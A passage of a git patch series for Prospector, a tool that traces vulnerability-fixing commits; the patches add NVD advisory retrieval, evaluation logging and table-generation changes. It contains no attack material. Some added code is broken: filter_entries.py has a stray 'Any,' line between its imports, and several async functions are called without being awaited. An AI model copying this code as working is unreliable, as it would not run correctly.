./data_sources/reports:/app/data_sources/reports - - ./evaluation/data/reports_with_llm/:/app/evaluation/data/reports_with_llm - - ./evaluation/data/reports_without_llm/:/app/evaluation/data/reports_without_llm + - ./evaluation/data/reports_with_llm/:/app/evaluation/data/reports_with_llm # Only relevant for evaluation data + - ./evaluation/data/reports_without_llm/:/app/evaluation/data/reports_without_llm # Only relevant for evaluation data + - ./../../../data/gitcache:/tmp/gitcache # LASCHA: check that this is correct depends_on: - redis environment: diff --git a/prospector/git/git.py b/prospector/git/git.py index c991faf95..7a3c93c6c 100644 --- a/prospector/git/git.py +++ b/prospector/git/git.py @@ -18,6 +18,7 @@ import multiprocessing.pool as mpp from git.exec import Exec from git.raw_commit import RawCommit +from git.version_to_tag import get_possible_tags from log.logger import logger from stats.execution import execution_statistics, measure_execution_time @@ -50,7 +51,7 @@ def istarmap(self, func, iterable, chunksize=1): mpp.Pool.istarmap = istarmap -def do_clone(url, output_folder, shallow=False, skip_existing=False): +def do_clone(url: str, output_folder, shallow=False, skip_existing=False): """ This function clones a git repository from the given URL to the specified output folder. It can perform a shallow clone and skip existing repositories if specified. @@ -67,7 +68,8 @@ def do_clone(url, output_folder, shallow=False, skip_existing=False): """ git = Git(url, cache_path=output_folder, shallow=shallow) git.clone(shallow=shallow, skip_existing=skip_existing) - return str(len(git.get_commits())) + + return def clone_repo_multiple( @@ -82,7 +84,11 @@ def clone_repo_multiple( repositories). This uses a tqdm progress bar to show how many repos have been cloned. """ - print(f"Using {concurrent} parallel workers") + logger.setLevel( + "DEBUG" + ) # Need to manually set as this method is called without using `main.py` + logger.debug(f"Using {concurrent} parallel workers") + with multiprocessing.Pool(concurrent) as pool: args = [ (url, output_folder, shallow, skip_existing) for url in url_list @@ -203,7 +209,7 @@ def clone(self, shallow=None, skip_existing=False): logger.debug(f"Skipping fetch of {self.url} in {self.path}") else: logger.debug( - f"Found repo {self.url} in {self.path}.\nFetching...." + f"Found repo {self.url} in {self.path}.\nFetching with `git fetch --progress --all --tags --force`." ) self.execute("git fetch --progress --all --tags --force") @@ -215,7 +221,9 @@ def clone(self, shallow=None, skip_existing=False): os.makedirs(self.path) - logger.debug(f"Cloning {self.url} (shallow={self.shallow_clone})") + logger.debug( + f"Cloning {self.url} (shallow={self.shallow_clone}) in folder {self.path}" + ) if not self.execute("git init", silent=False): logger.error(f"Failed to initialize repository in {self.path}") @@ -253,23 +261,39 @@ def get_commits( until=None, filter_extension=None, ) -> Dict[str, RawCommit]: + """Retrieves git commits: executes `git log` and parses the output to + return a dictionary of commits. + + Args: + next_tag (str, optional): The later tag to bound the commit range. + prev_tag (str, optional): The earlier tag to bound the commit range. + since (str, optional): The start date for filtering commits. + until (str, optional): The end date for filtering commits. + filter_extension (list, optional): List of file extensions to filter commits by. + + Returns: + Dict[str, RawCommit]: A dictionary where keys are commit hashes and values are + RawCommit objects containing commit details. + """ cmd = f"git log --all --name-only --full-index --format=%n{GIT_SEPARATOR}%n%H:%at:%P%n{GIT_SEPARATOR}%n%B%n{GIT_SEPARATOR}%n" + if next_tag and prev_tag: - cmd += f"{prev_tag}..{next_tag}" + cmd += f" {prev_tag}..{next_tag}" elif next_tag and not prev_tag: ts = self.get_timestamp(next_tag, "c") - cmd += f"--until={ts}" + cmd += f" --until={ts}" elif not next_tag and prev_tag: ts = self.get_timestamp(prev_tag, "a") - cmd += f"--since={ts}" + cmd += f" --since={ts}" else: - cmd += f"--since={since} --until={until}" + cmd += f" --since={since} --until={until}" if filter_extension: cmd += " *." + " *.".join(filter_extension) try: - logger.debug(cmd) + logger.debug(f"Retrieving commits with: {cmd}") out = self.execute(cmd) + logger.debug(f"Commit Logs (truncated): {out[:50]}") return self.parse_git_output(out) except Exception: @@ -422,12 +446,19 @@ def get_tag_for_version(self, version): def get_timestamp(self, item: str, ts_format: str) -> int: # ct is committer date, it is the default for the research using --until and --since out = self.execute(f"git log -1 --format=%{ts_format}t {item}") + logger.debug( + f"Got timestampe with `git log -1 --format=%{ts_format}t {item}`." + ) return int(out[0]) def get_tags(self): try: # Committer date to have the proper tag ordering - return self.execute("git tag --sort=committerdate") + results = self.execute("git tag --sort=committerdate") + logger.debug( + "Git command `git tag --sort=committerdate` successfully executed." + ) + return results except subprocess.CalledProcessError as exc: logger.error("Git command failed." + str(exc.output), exc_info=True) return [] From 0beec1560687de26c04c5b970cd991dd95016f1b Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 25 Jul 2024 12:34:06 +0000 Subject: [PATCH 058/130] reformatting --- prospector/data_sources/nvd/filter_entries.py | 230 ++++++++++++++++++ prospector/data_sources/nvd/nvd_test.py | 31 +++ 2 files changed, 261 insertions(+) create mode 100644 prospector/data_sources/nvd/filter_entries.py create mode 100644 prospector/data_sources/nvd/nvd_test.py diff --git a/prospector/data_sources/nvd/filter_entries.py b/prospector/data_sources/nvd/filter_entries.py new file mode 100644 index 000000000..d34620f92 --- /dev/null +++ b/prospector/data_sources/nvd/filter_entries.py @@ -0,0 +1,230 @@ +import asyncio +import csv +import datetime +import json +from typing import Any, List + +Any, +import aiofiles +import aiohttp +import psycopg2 +import requests +from psycopg2.extensions import parse_dsn +from psycopg2.extras import DictCursor, DictRow, Json + +from backenddb.postgres import PostgresBackendDB +from data_sources.nvd.versions_extraction import ( + extract_version_range, + extract_version_ranges_cpe, + process_versions, +) +from datamodel.nlp import extract_products +from log.logger import logger +from util.config_parser import parse_config_file + +config = parse_config_file() + +# with open("./data/project_metadata.json", "r") as f: +# global match_list +# match_list = json.load(f) + + +def connect_to_db(): + db = PostgresBackendDB( + config.database.user, + config.database.password, + config.database.host, + config.database.port, + config.database.dbname, + ) + db.connect() + return db + + +def disconnect_from_database(db): + db.disconnect() + + +async def retrieve_vulns(past_days_range: int): + """Retrieve advisory data from the NVD. + + Params: + past_days_range (int): How many days in the past the time range of + retrieved CVEs starts. + + Returns: + The raw data from the NVD database. + """ + start_date, end_date = get_time_range(past_days_range) + + data = "" + # Set up the URL to retrieve the latest CVE entries from NVD + nvd_url = "https://services.nvd.nist.gov/rest/json/cves/2.0?" + + nvd_url += f"lastModStartDate={start_date}&lastModEndDate={end_date}" + + async with aiohttp.ClientSession() as session: + try: + async with session.get(nvd_url) as response: + if response.status == 200: + data = await response.json() + else: + print("Error while trying to retrieve entries") + except aiohttp.ClientError as e: + print(str(e)) + logger.error( + "Error while retrieving vulnerabilities from NVD", exc_info=True + ) + + return data + + +def save_vuln_to_db(vulns: List[Any]): + """Saves raw advisory data to the database for a list of advisories as + obtained from the NVD database.""" + db = connect_to_db() + for vuln in vulns["vulnerabilities"]: + vuln_id = vuln["cve"]["id"] + pub_date = vuln["cve"]["published"] + mod_date = vuln["cve"]["lastModified"] + raw_record = json.dumps(vuln) + source = "NVD" + url = ( + f"https://services.nvd.nist.gov/rest/json/cves/2.0?cveID={vuln_id}" + ) + + res = db.lookup_vuln_id(vuln_id, mod_date) + if res[0] == 0: + print(f"Saving vuln: {vuln_id} in database") + db.save_vuln(vuln_id, pub_date, mod_date, raw_record, source, url) + db.disconnect() + + +async def get_cve_by_id(id): + nvd_url = f"https://services.nvd.nist.gov/rest/json/cves/2.0?cveID={id}" + + async with aiohttp.ClientSession() as session: + try: + async with session.get(nvd_url) as response: + if response.status == 200: + data = await response.json() + else: + print("Error while trying to retrieve entry") + except aiohttp.ClientError as e: + print(str(e)) + logger.error( + "Error while retrieving vulnerability from NVD", exc_info=True + ) + return data + + +async def add_single_cve(vuln_id: str): + raw_json_cve = get_cve_by_id(vuln_id) + save_vuln_to_db(raw_json_cve) + + +def write_list_to_file(lst, filename): + with open(filename, "w") as file: + for item in lst: + file.write(str(item) + "\n") + + +def csv_to_json(csv_file_path): + with open(csv_file_path, "r") as csv_file: + csv_reader = csv.reader(csv_file) + data = [] + # Skip the header row + next(csv_reader) + # Loop through the rows of the file + for row in csv_reader: + # Create a dictionary for the row data + row_data = { + "project": row[0], + "service_name": row[1], + "repository": row[2], + } + data.append(row_data) + # Convert to JSON object + json_data = json.dumps(data) + return json_data + + +def get_time_range(d_time): + # calculate the date to retrieve new entries (%Y-%m-%dT%H:%M:%S.%f%2B01:00) + date_now = datetime.datetime.now() + start_date = (date_now - datetime.timedelta(days=d_time)).strftime( + "%Y-%m-%dT%H:%M:%S" + ) + end_date = date_now.strftime("%Y-%m-%dT%H:%M:%S") + return start_date, end_date + + +async def process_entries(): + # start_date,end_date=get_time_range(d_time) + db = connect_to_db() + + # Retrieve unprocessed entries from the vulnerability table + unprocessed_vulns = db.get_unprocessed_vulns() + + # Process each entry + processed_vulns = [] + for unprocessed_vuln in unprocessed_vulns: + entry_id = unprocessed_vuln[0] + raw_record = unprocessed_vuln[1] + + processed_vuln = await map_entry(raw_record) + if processed_vuln is not None: + processed_vulns.append(processed_vuln) + db.save_processed_vuln( + entry_id, + processed_vuln["repo_url"], + processed_vuln["version_interval"], + ) + db.disconnect() + return processed_vulns + + +async def map_entry(vuln): + # TODO: improve mapping technique + async with aiofiles.open("./data/project_metadata.json", "r") as f: + match_list = json.loads(await f.read()) + + project_names = extract_products(vuln["cve"]["descriptions"][0]["value"]) + # print(project_names) + for project_name in project_names: + for data in match_list.values(): + keywords = [kw.lower() for kw in data["search keywords"]] + if project_name.lower() in keywords: + version = extract_version_range( + vuln["cve"], vuln["cve"]["descriptions"][0]["value"] + ) + filtered_vuln = { + "nvd_info": vuln, + "repo_url": data["git"], + "version_interval": version, + } + print(vuln["cve"]["id"]) + return filtered_vuln + + return None + + +# if no map is possible search project name using GitHub API +def retrieve_repository(project_name): + """ + Retrieve the GitHub repository URL for a given project name + """ + # GitHub API endpoint for searching repositories + url = "https://api.github.com/search/repositories" + + query_params = {"q": project_name, "sort": "stars", "order": "desc"} + + response = requests.get(url, params=query_params) + + if response.status_code == 200: + data = response.json() + if data["total_count"] > 0: + repository_url = data["items"][0]["html_url"] + return repository_url + + return None diff --git a/prospector/data_sources/nvd/nvd_test.py b/prospector/data_sources/nvd/nvd_test.py new file mode 100644 index 000000000..8aa41cb4b --- /dev/null +++ b/prospector/data_sources/nvd/nvd_test.py @@ -0,0 +1,31 @@ +from data_sources.nvd.filter_entries import ( + process_entries, + retrieve_vulns, + save_vuln_to_db, +) +from data_sources.nvd.job_creation import enqueue_jobs + +# request new cves entries through NVD API and save to db +cve_data = retrieve_vulns(7) + +# save to db +save_vuln_to_db(cve_data) + + +"""with open("filtered_cves.json", "w") as outfile: + json.dump(filtered_cves, outfile)""" + +print("retrieved cves") +# print(cves) + +# get entry from db and process +processed_vulns = process_entries() +print("ready to be enqueued: ") +print(processed_vulns) + +# if processed_vulns: +# for entry in processed_vulns: +# job_info = create_prospector_job(entry) +# save_job_to_db(job_info) + +enqueue_jobs() From 74e0df5ed8d71fbf52491eb8e9413f2d550b3b23 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 25 Jul 2024 12:52:35 +0000 Subject: [PATCH 059/130] creates own evaluation logger --- prospector/evaluation/analyse.py | 10 +++++++++- prospector/log/logger.py | 6 ++++-- 2 files changed, 13 insertions(+), 3 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 4ec0cd141..c364e1936 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -19,6 +19,11 @@ update_summary_execution_table, ) from evaluation.utils import load_dataset +from log.logger import create_logger + + +logger = create_logger("evaluation.log") +logger.setLevel("DEBUG") def analyze_results_rules(dataset_path: str): @@ -173,7 +178,10 @@ def analyze_prospector(filename: str): # noqa: C901 table_data = [] for key, value in results.items(): # print(f"{key}: {len(value)} ({(len(value)/1315)*100:.2f}%)") # Sanity Check - table_data.append([len(value), len(value) / len(dataset) * 100]) + logger.debug(f"Length of results: {len(results)}") + table_data.append( + [len(value), round(len(value) / len(results) * 100, 2)] + ) update_summary_execution_table( "MVI", diff --git a/prospector/log/logger.py b/prospector/log/logger.py index 38986097b..6e68a08c6 100644 --- a/prospector/log/logger.py +++ b/prospector/log/logger.py @@ -18,7 +18,9 @@ def get_level(string: bool = False): return logger.level -def create_logger(name: str = LOGGER_NAME) -> logging.Logger: +def create_logger( + log_file: str = "prospector.log", name: str = LOGGER_NAME +) -> logging.Logger: logger = logging.getLogger(name) logger.setLevel(logging.INFO) formatter = logging.Formatter( @@ -26,7 +28,7 @@ def create_logger(name: str = LOGGER_NAME) -> logging.Logger: "%m-%d %H:%M:%S", ) log_file = logging.handlers.RotatingFileHandler( - "prospector.log", maxBytes=2 * (10**6), backupCount=3 + log_file, maxBytes=2 * (10**6), backupCount=3 ) log_file.setFormatter(formatter) logger.addHandler(log_file) From 4ba005beb2a9f05283c4a5e0e7957fd7241dabde Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 25 Jul 2024 14:44:01 +0000 Subject: [PATCH 060/130] restructuring to have better file hierarchy and avoid cyclic imports --- prospector/evaluation/analyse.py | 86 ++++++++++++++++++++------ prospector/evaluation/dispatch_jobs.py | 76 ++++++++--------------- prospector/evaluation/run_multiple.py | 4 +- prospector/evaluation/save_results.py | 52 ---------------- prospector/evaluation/utils.py | 75 ++++++++++++++++++++++ 5 files changed, 168 insertions(+), 125 deletions(-) delete mode 100644 prospector/evaluation/save_results.py diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index c364e1936..631eff2c2 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -1,29 +1,20 @@ import csv from datetime import datetime import json -import re -import sys from collections import defaultdict from typing import Dict, List, Tuple import seaborn as sns from matplotlib import pyplot as plt -from evaluation.dispatch_jobs import ( +from evaluation.utils import ( + load_dataset, + update_summary_execution_table, + logger, INPUT_DATA_PATH, PROSPECTOR_REPORT_PATH, ANALYSIS_RESULTS_PATH, - build_table_row, -) -from evaluation.save_results import ( - update_summary_execution_table, ) -from evaluation.utils import load_dataset -from log.logger import create_logger - - -logger = create_logger("evaluation.log") -logger.setLevel("DEBUG") def analyze_results_rules(dataset_path: str): @@ -122,6 +113,7 @@ def analyze_prospector(filename: str): # noqa: C901 rulescount = defaultdict(lambda: 0) # For each CSV in the input dataset, check its report + logger.info("Checking reports") for itm in dataset: try: ( @@ -170,22 +162,42 @@ def analyze_prospector(filename: str): # noqa: C901 # ) total = len(dataset) - skipped + logger.debug(f"Analysed {total} reports.") rulescount = dict(sorted(rulescount.items())) make_rules_plot(rulescount) # Save the results to the Latex table - table_data = [] + table_data_categories = [] + # Calculate the sum of high confidence results: COMMIT_IN_REFERENCE + CVE_ID_IN_MESSAGE + CVE_ID_IN_LINKED_ISSUE + CROSS_REFERENCE + num_high_confidence = sum( + [ + len(v) + for k, v in results.items() + if k + in [ + "CVE_ID_IN_MESSAGE", + "CVE_ID_IN_LINKED_ISSUE", + "CROSS_REFERENCE", + "COMMIT_IN_REFERENCE", + ] + ] + ) + table_data_categories.append( + [num_high_confidence, round(num_high_confidence / total * 100, 2)] + ) for key, value in results.items(): - # print(f"{key}: {len(value)} ({(len(value)/1315)*100:.2f}%)") # Sanity Check - logger.debug(f"Length of results: {len(results)}") - table_data.append( - [len(value), round(len(value) / len(results) * 100, 2)] + logger.debug( + f"Key: {key}, Length of value: {len(value)}" + ) # Sanity Check + table_data_categories.append( + [len(value), round(len(value) / total * 100, 2)] ) update_summary_execution_table( "MVI", - table_data, + table_data_categories, + str(total), f"{ANALYSIS_RESULTS_PATH}summary_execution_results.tex", ) @@ -198,6 +210,34 @@ def analyze_prospector(filename: str): # noqa: C901 return missing +def build_table_row(matched_rules): + rules_list = [ + "COMMIT_IN_REFERENCE", + "CVE_ID_IN_MESSAGE", + "CVE_ID_IN_LINKED_ISSUE", + "CROSS_REFERENCED_JIRA_LINK", + "CROSS_REFERENCED_GH_LINK", + "CHANGES_RELEVANT_FILES", + "CHANGES_RELEVANT_CODE", + "RELEVANT_WORDS_IN_MESSAGE", + "ADV_KEYWORDS_IN_FILES", + "ADV_KEYWORDS_IN_MSG", + "SEC_KEYWORDS_IN_MESSAGE", + "SEC_KEYWORDS_IN_LINKED_GH", + "SEC_KEYWORDS_IN_LINKED_JIRA", + "GITHUB_ISSUE_IN_MESSAGE", + "JIRA_ISSUE_IN_MESSAGE", + "COMMIT_HAS_TWINS", + ] + out = [] + for id in rules_list: + if id in matched_rules: + out.append("/checkmark") + else: + out.append("") + return out + + def write_matched_rules( results, rulescount, @@ -454,6 +494,8 @@ def check_report(dataset, cve, fixing_commits): with open(f"{dataset}/{cve}.json", "r") as file: data = json.load(file) score_first = get_first_commit_score(data) + logger.debug(f"\n{cve}") + logger.debug(f"\tScore first: {score_first}") for index, commit in enumerate(data["commits"]): score_next = -1 @@ -465,15 +507,19 @@ def check_report(dataset, cve, fixing_commits): if is_fixing_commit(commit, fixing_commits): if index == 0: score_first = -1 - return get_commit_info( + result = get_commit_info( commit, index, score_first, score_next ) + logger.debug(f"\tFixing Commit Info: {result}") + + return result for index, commit in enumerate(data["commits"]): commit_info = get_non_fixing_commit_info( commit, index, score_first ) if commit_info: + logger.debug(f"Non-fixing Commit Info: {commit_info}") return commit_info return (False, 0, True, True, -1, None, []) diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 0d8fc8c15..2d6ff89eb 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -1,9 +1,8 @@ import csv import multiprocessing import os -from typing import List +from typing import Optional -from omegaconf import OmegaConf import redis import requests from dateutil.parser import isoparse @@ -13,23 +12,18 @@ from core.prospector import prospector from core.report import generate_report -from evaluation.utils import load_dataset +from evaluation.utils import ( + INPUT_DATA_PATH, + PROSPECTOR_REPORT_PATH, + load_dataset, + logger, + evaluation_config, +) from git.git import Git from git.version_to_tag import get_possible_tags from llm.llm_service import LLMService from util.config_parser import parse_config_file -evaluation_config = OmegaConf.load("evaluation/config.yaml") - -INPUT_DATA_PATH = evaluation_config.input_data_path -# Select the folder depending whether LLMs are used or not -PROSPECTOR_REPORT_PATH = ( - evaluation_config.prospector_reports_llm_path - if evaluation_config.prospector_settings.run_with_llm - else evaluation_config.prospector_reports_no_llm_path -) -ANALYSIS_RESULTS_PATH = evaluation_config.analysis_results_path - # get the redis server url config = parse_config_file() # redis_url = config.redis_url @@ -113,34 +107,6 @@ def temp_load_reservation_dates(dataset_path: str): return {itm[0]: int(itm[1]) for itm in reader} -def build_table_row(matched_rules): - rules_list = [ - "COMMIT_IN_REFERENCE", - "CVE_ID_IN_MESSAGE", - "CVE_ID_IN_LINKED_ISSUE", - "CROSS_REFERENCED_JIRA_LINK", - "CROSS_REFERENCED_GH_LINK", - "CHANGES_RELEVANT_FILES", - "CHANGES_RELEVANT_CODE", - "RELEVANT_WORDS_IN_MESSAGE", - "ADV_KEYWORDS_IN_FILES", - "ADV_KEYWORDS_IN_MSG", - "SEC_KEYWORDS_IN_MESSAGE", - "SEC_KEYWORDS_IN_LINKED_GH", - "SEC_KEYWORDS_IN_LINKED_JIRA", - "GITHUB_ISSUE_IN_MESSAGE", - "JIRA_ISSUE_IN_MESSAGE", - "COMMIT_HAS_TWINS", - ] - out = [] - for id in rules_list: - if id in matched_rules: - out.append("/checkmark") - else: - out.append("") - return out - - def delete_missing_git(dataset_path): dataset = load_dataset(dataset_path) for itm in dataset[:500]: @@ -288,12 +254,11 @@ def execute_prospector_wrapper(kwargs): def run_prospector_and_generate_report( - vuln_id, v_int, report_type: str, output_file + vuln_id, v_int, report_type: str, output_file, repository_url: str ): """Call the prospector() and generate_report() functions. This also creates the LLMService singleton so that it is available in the context of the job. """ - # print(f"Enabled rules: {config.enabled_rules}") # sanity check prospector_settings = evaluation_config.prospector_settings @@ -304,10 +269,16 @@ def run_prospector_and_generate_report( else config.enabled_rules.remove("COMMIT_IS_SECURITY_RELEVANT") ) + logger.info(f"Invoking prospector() function for {vuln_id}") LLMService(config.llm_service) + logger.debug( + f"Settings prospector() is invoked with: gitcache: {config.git_cache}, LLM usage: {prospector_settings.run_with_llm}." + ) + results, advisory_record = prospector( vulnerability_id=vuln_id, + repository_url=repository_url, version_interval=v_int, backend_address=backend, enabled_rules=enabled_rules, @@ -315,6 +286,8 @@ def run_prospector_and_generate_report( use_llm_repository_url=prospector_settings.run_with_llm, ) + logger.debug(f"prospector() returned. Generating report now.") + generate_report( results, advisory_record, @@ -330,7 +303,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): """Dispatches jobs to the queue.""" dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - # dataset = dataset[:10] + dataset = dataset[:3] # Only run a subset of CVEs if the user supplied a selected set if len(selected_cves) != 0: @@ -350,12 +323,13 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): job = Job.create( run_prospector_and_generate_report, - args=( - cve[0], - cve[2], - "json", - f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json", - ), + kwargs={ + "vuln_id": cve[0], + "v_int": cve[2], + "report_type": "json", + "output_file": f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json", + "repository_url": cve[1], + }, description="Prospector Job", id=cve[0], ) diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index 8026bc792..dba611782 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -14,6 +14,7 @@ empty_queue, parallel_execution, ) +from evaluation.utils import logger def is_missing(path: str): @@ -101,8 +102,7 @@ def main(argv): # Run Prospector containerised if args.execute and not args.analyze and not args.parallel: - # get_full_commit_ids(args.input) - # return + logger.info("Dispatching jobs.") dispatch_prospector_jobs(args.input, args.cve) # Run Prospector in parallel diff --git a/prospector/evaluation/save_results.py b/prospector/evaluation/save_results.py deleted file mode 100644 index fda24f888..000000000 --- a/prospector/evaluation/save_results.py +++ /dev/null @@ -1,52 +0,0 @@ -def save_to_json(): - pass - - -def save_to_csv(): - pass - - -def update_summary_execution_table(mode: str, data, filepath: str) -> None: - """Updates the latex table at {ANALYSIS_RESULTS_PATH}/`file_path`. For this to work, the table latex code from D6.3 for tracer_dataset_results table must be saved in the file. - - Params: - data (List(List(int, int))): The list of data, each item should be another list of two integers: the total and percentage. - - Saves: - The newly updated latex table at `file_path` - - Disclaimer: Partly generated with Claude Opus 3. - """ - # Read the existing LaTeX table from the file - with open(filepath, 'r') as file: - table_lines = file.readlines() - - # Find the line numbers to edit; CHANGE if table changes! - lines_to_edit = [5, 8, 11, 14, 17, 18, 19, 20, 21, 22] - - # Update the corresponding columns based on the mode - if mode == 'MVI': - col_indices = [1, 2] - elif mode == 'AVI': - col_indices = [3, 4] - elif mode == 'NVI': - col_indices = [5, 6] - else: - raise ValueError('Invalid mode. Please choose from MVI, AVI, or NVI.') - - try: - for i, line_number in enumerate(lines_to_edit): - row_data = table_lines[line_number].split('&') - for j, col_index in enumerate(col_indices): - row_data[col_index] = str(data[i][j]) - - table_lines[line_number] = ' & '.join(row_data) - except IndexError: - raise IndexError(f"Invalid data structure at row {line_number}, column {j}") - - # Write the updated table back to the file - with open(filepath, 'w') as file: - file.writelines(table_lines) - - print(f"Updated latex table at {filepath}") - diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index 90b9edfa0..0022f0ef0 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -1,8 +1,25 @@ import csv import re + +from omegaconf import OmegaConf from datamodel.advisory import build_advisory_record from urllib.parse import urlparse +from log.logger import create_logger + + +logger = create_logger("evaluation.log") +logger.setLevel("DEBUG") + +evaluation_config = OmegaConf.load("evaluation/config.yaml") +INPUT_DATA_PATH = evaluation_config.input_data_path +# Select the folder depending whether LLMs are used or not +PROSPECTOR_REPORT_PATH = ( + evaluation_config.prospector_reports_llm_path + if evaluation_config.prospector_settings.run_with_llm + else evaluation_config.prospector_reports_no_llm_path +) +ANALYSIS_RESULTS_PATH = evaluation_config.analysis_results_path VULN = ["version", "through", "versions"] @@ -22,6 +39,7 @@ def load_dataset(path: str): with open(path, "r") as file: reader = csv.reader(file, delimiter=";") + logger.debug(f"Loaded Dataset at {path}") return [row for row in reader if "CVE" in row[0] and row[3] != "True"] @@ -91,3 +109,60 @@ def check_advisory(cve, repository=None, nlp=None): res.append("***************************************") print(advisory.cve_id) return res + + +def update_summary_execution_table( + mode: str, data, data_total: str, filepath: str +) -> None: + """Updates the latex table at {ANALYSIS_RESULTS_PATH}/`file_path`. For this to work, the table latex code from D6.3 for tracer_dataset_results table must be saved in the file. + + Params: + data (List(List(int, int))): The list of data, each item should be another list of two integers: the total and percentage. + data_total: The total amount of reports, to be inserted in the last row of the table. + + Saves: + The newly updated latex table at `file_path` + + Disclaimer: Partly generated with Claude Opus 3. + """ + # Read the existing LaTeX table from the file + with open(filepath, "r") as file: + table_lines = file.readlines() + + # Find the row numbers to edit; CHANGE if table changes! + lines_to_edit = [5, 8, 11, 14, 17, 18, 19, 20, 21, 22] + + # Update the corresponding columns based on the mode + if mode == "MVI": + col_indices = [1, 2] + elif mode == "AVI": + col_indices = [3, 4] + elif mode == "NVI": + col_indices = [5, 6] + else: + raise ValueError( + "Invalid mode. Please choose from MVI, AVI, or NVI." + ) + + try: + for i, line_number in enumerate(lines_to_edit): + row_data = table_lines[line_number].split("&") + for j, col_index in enumerate(col_indices): + row_data[col_index] = str(data[i][j]) + + table_lines[line_number] = " & ".join(row_data) + except IndexError: + raise IndexError( + f"Invalid data structure at row {line_number}, column {j}" + ) + + # Add the last row showing the total count + last_row_data = table_lines[23].split("&") + last_row_data[col_indices[0]] = f"\\textbf{data_total}" + table_lines[23] = " & ".join(last_row_data) + + # Write the updated table back to the file + with open(filepath, "w") as file: + file.writelines(table_lines) + + print(f"Updated latex table at {filepath}") From f727ae5e1a44b84823155e9f644dc1bcfe916382 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 29 Jul 2024 07:19:41 +0000 Subject: [PATCH 061/130] adds script to trigger repository cloning for CVEs --- prospector/pipeline/cloning_repos.py | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/prospector/pipeline/cloning_repos.py b/prospector/pipeline/cloning_repos.py index c7ca17bbb..aa95fb198 100644 --- a/prospector/pipeline/cloning_repos.py +++ b/prospector/pipeline/cloning_repos.py @@ -11,7 +11,19 @@ for cve_record in dataset: urls.add(cve_record[1]) -urls = list(urls)[:10] +# urls = list(urls) +# urls = [ +# "https://github.com/Turistforeningen/node-im-resize", # CVE-2019-10787 +# "https://github.com/remy/undefsafe", # CVE-2019-10795 +# "https://github.com/Froxlor/Froxlor", # CVE-2020-10236 +# "https://github.com/jnunemaker/crack", +# "https://github.com/django-tastypie/django-tastypie", +# "https://github.com/pyinstaller/pyinstaller", +# "https://github.com/rails/rails-html-sanitizer", +# "https://github.com/scipy/scipy", +# "https://github.com/parcel-bundler/parcel", +# "https://github.com/javamelody/javamelody", +# ] print(f"Retrieved {len(urls)} distinct repositories from the dataset.") @@ -21,6 +33,7 @@ output_folder="/home/i748376/data/gitcache", skip_existing=False, shallow=False, + concurrent=1, ) print("Cloning completed. Results: ", results) From d36bbc4b85cf84c876a4e820ad811c6f6b209256 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 29 Jul 2024 07:20:09 +0000 Subject: [PATCH 062/130] rewrites method to generate D6.3 summary execution table --- prospector/evaluation/analyse.py | 337 +++++++++++++++++++++---- prospector/evaluation/config.yaml | 25 +- prospector/evaluation/dispatch_jobs.py | 37 ++- prospector/evaluation/run_multiple.py | 4 +- prospector/evaluation/utils.py | 14 +- 5 files changed, 341 insertions(+), 76 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 631eff2c2..862c28899 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -6,9 +6,11 @@ import seaborn as sns from matplotlib import pyplot as plt +from tqdm import tqdm from evaluation.utils import ( load_dataset, + update_false_positives, update_summary_execution_table, logger, INPUT_DATA_PATH, @@ -17,6 +19,29 @@ ) +STRONG_RULES = [ + "COMMIT_IN_REFERENCE", + "VULN_ID_IN_MESSAGE", + "VULN_ID_IN_LINKED_ISSUE", + # "XREF_BUG", # LASCHA: fix this, these two XREF ones should be combined + "XREF_GH", +] + +WEAK_RULES = [ + "CHANGES_RELEVANT_FILES", + "CHANGES_RELEVANT_CODE", + "RELEVANT_WORDS_IN_MESSAGE", + "ADV_KEYWORDS_IN_FILES", + "ADV_KEYWORDS_IN_MSG", + "SEC_KEYWORDS_IN_MESSAGE", + "SEC_KEYWORDS_IN_LINKED_GH", + "SEC_KEYWORDS_IN_LINKED_BUG", + "GITHUB_ISSUE_IN_MESSAGE", + "BUG_IN_MESSAGE", + "COMMIT_HAS_TWINS", +] + + def analyze_results_rules(dataset_path: str): """This function analyses Prospector's rule application. It calculates the frequency of each rule being matched across the dataset in `dataset_path`. @@ -89,6 +114,211 @@ def analyze_results_rules(dataset_path: str): # print(f"{k}: {v[3]}/commit/{v[0]}") +def analyse_prospector_reports(filename: str): + """Analyses Prospector reports. Creates the summary_execution_results table.""" + file = INPUT_DATA_PATH + filename + ".csv" + dataset = load_dataset(file) + # dataset = dataset[10:15] + + fixing_commit_found = 0 + fixing_commit_not_among_10 = 0 + fixing_commit_not_found = 0 + + # Confidence + confidence = { + "high": [], + "medium": [], + "low": [], + } + + strong_rules_count = dict(zip(STRONG_RULES, [0] * len(STRONG_RULES))) + + # Analysis statistics + # Keep track of how many reports were attempted to be analysed + attempted_report_analysis = 0 + # Keep track of how many reports were analysed + num_analysed_reports = 0 + # Keep track of the CVEs where there is no report file + reports_not_found = [] + + for record in tqdm(dataset, total=len(dataset), desc="Analysing Records"): + # 